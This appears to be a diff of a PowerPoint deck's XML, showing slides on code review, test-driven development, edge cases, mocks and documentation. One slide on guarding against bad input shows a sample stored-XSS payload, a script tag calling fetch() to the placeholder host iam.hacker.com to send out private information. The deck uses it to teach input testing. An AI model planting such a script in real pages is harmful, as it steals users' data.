+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/>
+    </p:ext>
+  </p:extLst>
 </p:presentation>
 </file>
 
@@ -4701,30 +4706,33 @@
             </a:r>
           </a:p>
           <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- Input that is too long. Does it crash the database?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+              <a:t>Input that is too long. Does it crash the database?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- What happens if blank input is sent?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+              <a:t>What happens if blank input is sent?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>- What happens if UTF-8 is enabled and we send a weird character?</a:t>
+              <a:t>What happens if UTF-8 is enabled and we send a weird character?</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6067,7 +6075,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t>Easy to align method, or attributes. </a:t>
+              <a:t>Easy to align methods, or attributes. </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6296,7 +6304,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> produce side-effects unless it is explicitly named such. E.g., </a:t>
+              <a:t> produce side-effects unless they are explicitly named as such. E.g., </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">

--- a/code_review.pptx
+++ b/code_review.pptx
@@ -16,9 +16,11 @@
     <p:sldId id="271" r:id="rId10"/>
     <p:sldId id="266" r:id="rId11"/>
     <p:sldId id="267" r:id="rId12"/>
-    <p:sldId id="268" r:id="rId13"/>
-    <p:sldId id="269" r:id="rId14"/>
-    <p:sldId id="270" r:id="rId15"/>
+    <p:sldId id="274" r:id="rId13"/>
+    <p:sldId id="268" r:id="rId14"/>
+    <p:sldId id="269" r:id="rId15"/>
+    <p:sldId id="270" r:id="rId16"/>
+    <p:sldId id="272" r:id="rId17"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -546,7 +548,7 @@
           <a:p>
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -757,7 +759,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -972,7 +974,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1175,7 +1177,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1459,7 +1461,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1703,7 +1705,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2146,7 +2148,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2292,7 +2294,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2410,7 +2412,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2694,7 +2696,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2989,7 +2991,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -3484,7 +3486,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/22/21</a:t>
+              <a:t>9/23/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -4477,30 +4479,33 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>1. In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+              <a:t>In general, write Test-driven Development code, because it helps to ensure the SOLID principles.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>2. Write as many edge-cases as possible.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+              <a:t>Write as many edge-cases as possible.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>3. Use the </a:t>
+              <a:t>Use the </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -4524,16 +4529,15 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>junit.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
-            </a:r>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://junit.org/junit5/docs/current/user-guide/#writing-tests-parameterized-tests</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4585,17 +4589,20 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3567023" y="783134"/>
-            <a:ext cx="5057954" cy="948662"/>
+            <a:off x="3101767" y="783134"/>
+            <a:ext cx="6449336" cy="948662"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Testing Benefits</a:t>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Testing Benefits Part 1</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4624,7 +4631,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -4643,8 +4650,12 @@
               <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fool-proofing (no offence), Look there is even a definition in the dictionary!</a:t>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Foolproofing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (no offence), Look there is even a definition in the dictionary!</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4653,17 +4664,12 @@
               <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>www.merriam-webster.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/dictionary/foolproof</a:t>
-            </a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://www.merriam-webster.com/dictionary/foolproof</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="457200" indent="-457200">
@@ -4693,107 +4699,6 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Legibility</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ensures against bad input</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Input that is too long. Does it crash the database?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>What happens if blank input is sent?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>What happens if UTF-8 is enabled and we send a weird character?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
-              <a:buChar char="-"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>What happens if the user writes this input into the database:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&lt;script </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>crossorigin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>  fetch("https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>iam.hacker.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>", { "info": "all your private information" }); </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>&lt;/script&gt;</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4846,18 +4751,20 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3797458" y="783134"/>
-            <a:ext cx="5057954" cy="948662"/>
+            <a:off x="3101767" y="783134"/>
+            <a:ext cx="6449336" cy="948662"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Mocks</a:t>
+              <a:t>Testing Benefits Part 2</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4896,71 +4803,98 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Mocks can be used to change the </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>behaviour</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> of the codebase</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>Ensures against bad input</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external system.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>Input that is too long. Does it crash the database?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>I am not a proponent of mocks because they can trick you into believing your code works.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>What happens if blank input is sent?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In AEM we use Mockito, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>site.mockito.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" indent="-457200">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
+              <a:t>What happens if UTF-8 is enabled and we send a weird character?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In JavaScript/TypeScript we use Jest, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>jestjs.io</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
+              <a:t>What happens if the user writes this input into the database:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;script </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>crossorigin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>  fetch("https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>iam.hacker.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>", { "info": "all your private information" }); </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;/script&gt;</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4968,7 +4902,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783818960"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694595038"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5000,7 +4934,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABFA6D66-A71E-5840-BBCE-2141326B5BF1}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B680625F-1D3E-684E-9A97-99AF2D9D74A3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5013,17 +4947,18 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="758952" y="758952"/>
-            <a:ext cx="4925752" cy="4754880"/>
+            <a:off x="3567023" y="783134"/>
+            <a:ext cx="5057954" cy="948662"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Documentation</a:t>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Mocks</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5033,7 +4968,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68BEE99F-0F50-FD4A-A37D-A5B6B921F8CE}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B84D27A-B095-AC4F-9924-F39C410D75A4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5046,49 +4981,84 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="5684704" y="758952"/>
-            <a:ext cx="5745296" cy="4754880"/>
+            <a:off x="1344057" y="1731796"/>
+            <a:ext cx="9964757" cy="4343070"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>1. When unsure, please check the reference. Say you are using jQuery, which we so happen to use a lot in AEM, please check https://</a:t>
+              <a:t>Mocks can be used to change the </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>jquery.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> for documentation.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
+              <a:t>behaviour</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> of the codebase</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>2. Better yet, find out the version first. For jQuery use </a:t>
+              <a:t>Unfortunately, some tests need mocks because they are tied to an external system such as HTTP requests or a database. Using mocks can help bypass the code that uses the external system.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>I am not a proponent of mocks because they can trick you into believing your code works.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>In AEM we use Mockito, </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+                <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>$.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              <a:t>https://site.mockito.org/</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>In JavaScript/TypeScript we use Jest, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>fn.jquery</a:t>
+              <a:t>https://jestjs.io/</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -5097,7 +5067,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2399234039"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783818960"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5129,6 +5099,139 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABFA6D66-A71E-5840-BBCE-2141326B5BF1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="758952" y="758952"/>
+            <a:ext cx="4925752" cy="4754880"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Documentation</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68BEE99F-0F50-FD4A-A37D-A5B6B921F8CE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5684704" y="758952"/>
+            <a:ext cx="5745296" cy="4754880"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>When unsure, please check the reference. Say you are using jQuery, which we so happen to use a lot in AEM, please check </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://jquery.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> for documentation.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" indent="-457200">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Better yet, find out the version first. For jQuery use </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>$.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>fn.jquery</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
